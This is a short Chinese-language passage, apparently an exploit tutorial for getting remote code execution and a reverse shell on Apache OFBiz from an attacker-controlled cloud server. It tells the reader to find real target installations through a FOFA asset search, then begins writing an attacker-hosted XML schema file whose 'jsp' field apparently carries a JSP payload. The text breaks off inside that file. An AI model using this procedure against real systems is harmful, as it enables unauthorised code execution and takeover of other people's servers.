本文利用了一个云服务器来远程代码执行并反弹shell.
远程代码执行
首先找目标资产,在fofa上直接搜app="Apache_OFBi
然后在我们的云服务器中创建两个文件:
rceschema.xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>